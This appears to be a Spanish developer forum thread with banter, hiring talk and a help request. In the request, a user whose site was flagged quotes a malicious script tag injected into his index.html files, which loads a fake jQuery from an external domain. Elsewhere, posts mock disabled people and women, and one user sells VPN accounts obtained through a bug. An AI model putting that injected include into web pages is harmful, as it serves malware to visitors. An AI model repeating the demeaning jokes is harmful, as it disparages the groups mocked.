Feda /dev/

HelThunk

El pavo te fiverr a desaparecido, le mandé un mensaje antes de ayer y me dijo que estaba trabajando en ello, para mi que espera a lo de los 14 días para evitar reclamaciones jajajaj

1 respuesta
eZpit

#14611 Yo creo que se ha ido a la islas caiman con tu dinero a vivir la vida loca

2
Troyer

Os imagináis un sysadmin haciendo algo útil aparte de pelar cables?

B

Lo de pedir un grado mínimo de minusvalía lo he visto desde hace años, contratar un desarrollador con una minusvalía del 33 que en la mayoría de los casos no afecta al trabajo te sale casi gratis con las ayudas. Incluso puedes hacer un combo de discapacitado + mujer/hombre + 45 https://www.portalento.es/Comunicacion/Noticias/Detalle/beneficios-fiscales-por-contratar-discapacitados-en-tu-empresa/3095 .

AikonCWD

Lo mismo que contratar a mujeres. El combo viene si pones en la oferta:

Requisitos: Mujer, Minusvalida 33% y estéril (para que no te pille la baja por maternidad/jornada reducida).

2 respuestas
Troyer

Si quieres curro fijo y fácil:

> Sácate una FP DAW o DAM.
> Estudia el framework de moda.
> Amputate las dos piernas.

#14615 Las programadoras sólo valen para limpiar código.

2 1 respuesta
AikonCWD

#14616 En mi otro curro, había una chica programadora (sí, era bastante gorda, os lo juro) y un día la vi comentando líneas de código para quitar errores al compilar

1 2 respuestas
B

2
Troyer

pineda

#14615 y esto es lo que en españa se entiende como continuous integration

gohrum

When i'm searching for variable names

13
eZpit

btw, las empresas medio-grandes tienen que cumplir una cuota mínima de empleados con minusvalia, así que no me parece tan raro que lo especifiquen. Lo que ya no tengo claro es si siendo tan explícitos pueden incurrir en una discriminación de algún tipo.

Markitos_182

4
s4suk3

vendo vendo barato barato me lo quitan de las manos
http://www.mediavida.com/foro/compra-venta/vendo-key-suscripcion-premium-vpn-zenmate-601233

pd: gracias a un bug me sobran las cuentas en zenmate xD

1 respuesta
HelThunk

#14624 Claro, por qué reportarlo y no ponerte a vender cuentas por ahí (robando básicamente) esta sobre-valorado

1 respuesta
s4suk3

1 1 respuesta
gohrum

#14626 asi gritas después de que te cierren el chiringo?

1
Troyer

#14625 tranqui, esta es la mítica que en un futuro haya un exploit en su software, le jodan a el y entienda por que está mal lo que hace.

pineda

is not a bug, is a feature

2
Louise

Alguien por aquí que curre con RPA? AA, BluePrism o UiPath?

#14617 creo que su problema estaba en la cabeza no en su peso

gohrum

Me ha pasado una cosa rarisima, tengo una web (a la que no le dedico mucho tiempo, pero da igual), que no está hecha con cms ni con wordpress ni nada.
El tema es que google me la ha marcado como una web con codigo malicioso

He investigado y resulta que efectivamente, en el index.html se había puesto un script a "jquery", un script que yo no puse (basicamente xq la web no usa jquery). El htaccess está bien, la web no tiene librerías de terceros, y nadie tiene acceso al FTP. De hecho cambié la web a un vps hace unos meses.

Como puede ser que haya ocurrido esto?

2 respuestas
Troyer

Macho, tan mal programas que google detecta tu código malicioso?

#14631 Seguramente se te han colado en el server y pegado el código, por curiosidad, lo sigues teniendo?

2 respuestas
gohrum

#14632 ahi está el tema, como se han colado?
El codigo era solo un

<script src="webrandom.download/jquery.js">

No recuerdo la web

1 respuesta
Troyer

#14633 Check: https://security.stackexchange.com/questions/7443/how-do-you-know-your-server-has-been-compromised

A ti te pasó el punto 3, aplica lo que dice para limpiarlo o te volverán a poner el include guarro.

To clean it up (if you are compromised) you really do need to go back to bare metal and reinstall. It is painful but is really the only way to be sure that you have got the whole lot.

1 respuesta
B

#14631 Puede ser que se colaran desde otra web en el mismo hosting y tu index tuviera permisos de escritura para el usuario del servidor web.

gohrum

He seguido investigando esa mierda, y esto es lo que he encontrado.

#14632 este es el codigo:

<!-- . --><script src=" https :// www . securedatas . download/jquery-3.2.1.min.js"></script><!-- . -->

#14634 Recordaba mal, tengo un vps, pero esta web no la pasé al vps. Está en un shared de OVH.

Además, tenia una carpeta con el clasico old_www, y ese index tb se ha reemplazado, de forma que debe ser algun tipo de script que reemplaza index.html y añade ese script src al body.

EDIT: estoy revisando otros archivos index.html en otras carpetas y efectivamente todas tienen lo mismo.

eXtreM3

El FCM tiene límite de peticiones por segundo/minuto?

1 respuesta
LLoid

#14637 nvm, te he entendido mal.

¿Te refieres a Firebase Cloud Messaging?

B

señores frontends que usais para vuestros proyectos o webs a clientes? desde 0? desde una plantilla , bootstrap..?

1 1 respuesta
s4suk3

depende para que cliente xD lo normal es wordpress o cualquier cms donde el cliente pueda editar fácil el contenido y tu partir de una plantilla
a no ser que te pidan hacer un spotify o algo complejo

Tema cerrado